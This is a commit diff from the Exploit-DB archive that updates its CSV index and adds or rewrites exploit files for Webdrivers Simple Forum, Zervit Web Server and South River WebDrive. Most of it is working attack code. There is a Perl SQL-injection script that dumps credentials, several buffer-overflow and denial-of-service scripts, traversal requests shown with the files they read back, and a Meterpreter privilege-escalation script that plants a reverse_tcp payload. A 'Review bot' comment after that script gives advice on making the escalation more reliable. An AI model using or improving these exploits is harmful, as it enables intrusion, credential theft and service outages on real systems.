DB: 2016-03-09

1 new exploit
This commit is contained in:
Offensive Security 2016-03-09 05:02:46 +00:00
parent 4cae1b12fc
commit a7c11413af
8 changed files with 388 additions and 269 deletions


@ -2411,7 +2411,7 @@ id,file,description,date,author,platform,type,port
2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0
2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0
2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0
2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0
2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0
2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability",2006-11-06,the_day,php,webapps,0
@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port
8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0
8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0
8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0
8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0
8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-16,Dns-Team,php,webapps,0
8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling Vulnerability",2009-04-16,ZoRLu,php,webapps,0
@ -7970,7 +7970,7 @@ id,file,description,date,author,platform,type,port
8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0
8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 (Login Bypass) SQL Injection Vulnerability",2009-04-16,tmh,php,webapps,0
8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0
8463,platforms/windows/remote/8463.txt,"Zervit Webserver 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 (Auth Bypass) SQL Injection Vulnerability",2009-04-17,"Salvatore Fresta",php,webapps,0
8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit",2009-04-17,"Code Audit Labs",windows,dos,0
8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0
@ -8007,7 +8007,7 @@ id,file,description,date,author,platform,type,port
8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln",2009-04-20,"Salvatore Fresta",php,webapps,0
8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0
8500,platforms/windows/dos/8500.py,"Zervit Webserver 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0
8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (LFI/SQL) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0
8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 (include) Local File Inclusion Vulnerability",2009-04-21,SirGod,php,webapps,0
@ -8029,7 +8029,7 @@ id,file,description,date,author,platform,type,port
8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0
8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0
8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0
8522,platforms/windows/dos/8522.pl,"Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
8522,platforms/windows/dos/8522.pl,"Zervit Web Server <= 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0
8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0
@ -8171,7 +8171,7 @@ id,file,description,date,author,platform,type,port
8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0
8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0
8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment - JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
8666,platforms/windows/remote/8666.txt,"zervit webserver 0.4 - Directory Traversal / memory corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0
8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0
8669,platforms/multiple/dos/8669.c,"ipsec-tools racoon frag-isakmp Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0
@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port
8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability",2009-05-18,Mi4night,php,webapps,0
8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0
@ -10279,7 +10279,7 @@ id,file,description,date,author,platform,type,port
11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0
11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0
11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0
11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring - Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0
11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0
11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0
11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0
11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0
@ -10329,7 +10329,7 @@ id,file,description,date,author,platform,type,port
11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0
11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0
11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec Remote files",2010-01-26,"Nikoal Petrov",php,webapps,0
11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit SEH",2010-01-26,TecR0c,windows,local,0
@ -11483,8 +11483,8 @@ id,file,description,date,author,platform,type,port
12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0
12579,platforms/php/webapps/12579.txt,"Joomla Custom PHP Pages Component com_php LFI Vulnerability",2010-05-12,"Chip d3 bi0s",php,webapps,0
12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0
12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0



@ -1,48 +1,48 @@
#!perl
use IO::Socket;
#Download:http://www.thewebdrivers.com/forum.zip
#By:Bl0od3r
#Germany =]
if (@ARGV<3) {
&header;
} else {
&get();
}
sub get() {
$host=$ARGV[0];
$path=$ARGV[1];
$id=$ARGV[2];
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
or die ("[-]Error\n");
print "[~]Connecting!\n";
print "[~]Getting Data!\n";
print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($ans=<$socket>) {
$ans=~ m/<span class="style3">&nbsp;Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:";
$ans=~ m/<td class=\"text\">(.*?)<\/td>/ && print "$1\n";
if ($1) {
$success=1; } else { $success=0;};
}
if ($success=="1") {
print "\n[+]Successed!";
} else {
print "[-]Error";
}
}
sub header() {
print
"--------------------------------------------------------------------\n";
print "|\t---------->By Bl0od3r<---------\t\t\t\t |";
print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |";
print
"\n--------------------------------------------------------------------\n";
exit;
}
# greetz to all dc3 members,matrix_killer and skOd =]
# milw0rm.com [2006-11-05]
#!perl
use IO::Socket;
#Download:http://www.thewebdrivers.com/forum.zip
#By:Bl0od3r
#Germany =]
if (@ARGV<3) {
&header;
} else {
&get();
}
sub get() {
$host=$ARGV[0];
$path=$ARGV[1];
$id=$ARGV[2];
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
or die ("[-]Error\n");
print "[~]Connecting!\n";
print "[~]Getting Data!\n";
print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($ans=<$socket>) {
$ans=~ m/<span class="style3">&nbsp;Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:";
$ans=~ m/<td class=\"text\">(.*?)<\/td>/ && print "$1\n";
if ($1) {
$success=1; } else { $success=0;};
}
if ($success=="1") {
print "\n[+]Successed!";
} else {
print "[-]Error";
}
}
sub header() {
print
"--------------------------------------------------------------------\n";
print "|\t---------->By Bl0od3r<---------\t\t\t\t |";
print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |";
print
"\n--------------------------------------------------------------------\n";
exit;
}
# greetz to all dc3 members,matrix_killer and skOd =]
# milw0rm.com [2006-11-05]


@ -1,50 +1,50 @@
#################### Zervit Webserver 0.02 Buffer Overflow ############################
############### By: e.wiZz!
###############Site: www.balcansecurity.com
############### Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
########################################################################################
######Vend0r site: http://www.ohloh.net/projects/mereo
/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */
using System;
using System.IO;
using System.Net;
using System.Text;
class whatsoever
{
static void Main()
{
// StringBuilder sb = new StringBuilder();
//byte[] buf = new byte[8192];
Console.WriteLine("Enter site: (http://localhost)");
string sajt = Console.ReadLine();
string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
HttpWebRequest request = (HttpWebRequest)
WebRequest.Create(sajt+uribad);
HttpWebResponse response = (HttpWebResponse)
request.GetResponse();
// you shouldn't see response
Console.WriteLine(sb.ToString());
}
}
// milw0rm.com [2009-04-15]
#################### Zervit Webserver 0.02 Buffer Overflow ############################
############### By: e.wiZz!
###############Site: www.balcansecurity.com
############### Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
########################################################################################
######Vend0r site: http://www.ohloh.net/projects/mereo
/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */
using System;
using System.IO;
using System.Net;
using System.Text;
class whatsoever
{
static void Main()
{
// StringBuilder sb = new StringBuilder();
//byte[] buf = new byte[8192];
Console.WriteLine("Enter site: (http://localhost)");
string sajt = Console.ReadLine();
string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
HttpWebRequest request = (HttpWebRequest)
WebRequest.Create(sajt+uribad);
HttpWebResponse response = (HttpWebResponse)
request.GetResponse();
// you shouldn't see response
Console.WriteLine(sb.ToString());
}
}
// milw0rm.com [2009-04-15]


@ -1,31 +1,31 @@
import socket
import sys
print "------------------------------------------------------"
print " Zervit Webserver 0.3 Remote Denial Of Service "
print " url: http://zervit.sourceforge.net "
print " "
print " author: shinnai "
print " mail: shinnai[at]autistici[dot]org "
print " site: http://www.shinnai.net "
print " "
print " greets to: e.wiZz! for inspiration. Be safe man... "
print " "
print " dedicated to: all those tried to own my site :-p "
print "------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
buff = "//.\\" * 330
request = "GET " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
raw_input('\n\nExploit completed. Press "Enter" to quit...')
sys.exit
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
# milw0rm.com [2009-04-21]
import socket
import sys
print "------------------------------------------------------"
print " Zervit Webserver 0.3 Remote Denial Of Service "
print " url: http://zervit.sourceforge.net "
print " "
print " author: shinnai "
print " mail: shinnai[at]autistici[dot]org "
print " site: http://www.shinnai.net "
print " "
print " greets to: e.wiZz! for inspiration. Be safe man... "
print " "
print " dedicated to: all those tried to own my site :-p "
print "------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
buff = "//.\\" * 330
request = "GET " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
raw_input('\n\nExploit completed. Press "Enter" to quit...')
sys.exit
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
# milw0rm.com [2009-04-21]


@ -1,39 +1,39 @@
#!/usr/bin/perl
#
# Zervit HTTP Server <= v0.3 Remote Denial of Service.
#
# --------------------------------------------------------------------
# The vulnerability is caused due to an error in multi-socket.
# This can be exploited to crash the HTTP service.
# --------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan\n";
print "[+] Soft : Zervit 0.3 Remote DoS\n";
if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 80\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";
print $socket "GET \x11 HTTP/1.0\n\r\n";
}
# milw0rm.com [2009-04-22]
#!/usr/bin/perl
#
# Zervit HTTP Server <= v0.3 Remote Denial of Service.
#
# --------------------------------------------------------------------
# The vulnerability is caused due to an error in multi-socket.
# This can be exploited to crash the HTTP service.
# --------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan\n";
print "[+] Soft : Zervit 0.3 Remote DoS\n";
if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 80\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";
print $socket "GET \x11 HTTP/1.0\n\r\n";
}
# milw0rm.com [2009-04-22]

119
platforms/windows/local/11264.rb Executable file

@ -0,0 +1,119 @@
##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
# Due to an empty security descriptor, a local attacker can gain elevated privileges.
# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
# Vulnerability mitigation featured.
#
# Credit:
# - Discovery - Nine:Situations:Group::bellick
# - Meterpreter script - Trancer
#
# References:
# - http://retrogod.altervista.org/9sg_south_river_priv.html
# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
# - http://osvdb.org/show/osvdb/59080
#
# mtrancer[@]gmail.com
# http://www.rec-sec.com
##
#
# Options
#
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "This help menu"],
"-m" => [ false, "Mitigate"],
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
"-p" => [ true, "The port on the remote host where Metasploit is listening"]
)
#
# Default parameters
#
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
print_line(opts.usage)
raise Rex::Script::Completed
when "-m"
client.sys.process.get_processes().each do |m|
if ( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Set correct service security descriptor to mitigate the vulnerability
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
end
end
raise Rex::Script::Completed
when "-r"
rhost = val
when "-p"
rport = val.to_i
end
end
client.sys.process.get_processes().each do |m|
if ( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
# Stop the vulnerable service
print_status("Stopping service \"#{sname}\"...")
client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
# Set exe payload as service binpath
print_status("Setting \"#{sname}\" to #{tempexe}...")
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
sleep(1)
# Restart the service
print_status("Restarting the \"#{sname}\" service...")
client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
# Set service binpath back to normal
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
end
end
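Review bot: The restore step at the end of the second loop (`sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}`) passes an unquoted image path that, once cmd.exe expands `%ProgramFiles%`, contains a space, so `sc` is likely to either reject the command or record `C:\Program` as the binpath, leaving the service unable to start; it also assumes the product lives in its default directory. Read the service's current image path (for example from `sc qc \"#{sname}\"`) before the first `binpath=` change and restore exactly that string, quoted, instead of a hard-coded default; at minimum quote the path, `binpath= \"%ProgramFiles%\\WebDrive\\#{pname}\"`, and do the same for `tempexe` in the earlier `sc config` call in case `%TEMP%` resolves to a path with spaces. Separately, the `-m` mitigation branch keys off a running `wdService.exe` process, so when the service is installed but stopped no security descriptor is set and nothing is reported; checking the service itself (`sc query` / `sc sdshow`) and printing a status when no match is found would make the mitigation reliable. The `client.fs.file.new` / `fd.write` / `fd.close` sequence also leaks the handle if the write raises; wrapping it in `begin ... ensure fd.close end` keeps it tidy.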


@ -1,27 +1,27 @@
#################### Zervit Webserver Directory Traversal ############################
############### By: e.wiZz!
###############Site: www.balcansecurity.com
############### Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
########################################################################################
#Site: http://zervit.sourceforge.net/
#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings.
It is being developed thinking in the people that will make use of it and tries to make itself intuitive.
It aims to make file sharing or displaying a web easier than the current servers do.
#Vulnerability:
http://[site]/../../../../../../boot.ini
# milw0rm.com [2009-04-16]
#################### Zervit Webserver Directory Traversal ############################
############### By: e.wiZz!
###############Site: www.balcansecurity.com
############### Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
########################################################################################
#Site: http://zervit.sourceforge.net/
#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings.
It is being developed thinking in the people that will make use of it and tries to make itself intuitive.
It aims to make file sharing or displaying a web easier than the current servers do.
#Vulnerability:
http://[site]/../../../../../../boot.ini
# milw0rm.com [2009-04-16]


@ -1,63 +1,63 @@
####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########
By: e.wiZz! & shinnai
Site: shinnai.net & balcansecurity.com
[Memory Corruption]
########################################################################
import socket
host = "127.0.0.1"
port = 8080
try:
for i in range(1,10):
buff = "a" * 3330
request = "POST " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
[Directory traversal]
#################################################################################
[Request]
GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################
[Response]
HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################
# milw0rm.com [2009-05-13]
####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########
By: e.wiZz! & shinnai
Site: shinnai.net & balcansecurity.com
[Memory Corruption]
########################################################################
import socket
host = "127.0.0.1"
port = 8080
try:
for i in range(1,10):
buff = "a" * 3330
request = "POST " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
[Directory traversal]
#################################################################################
[Request]
GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
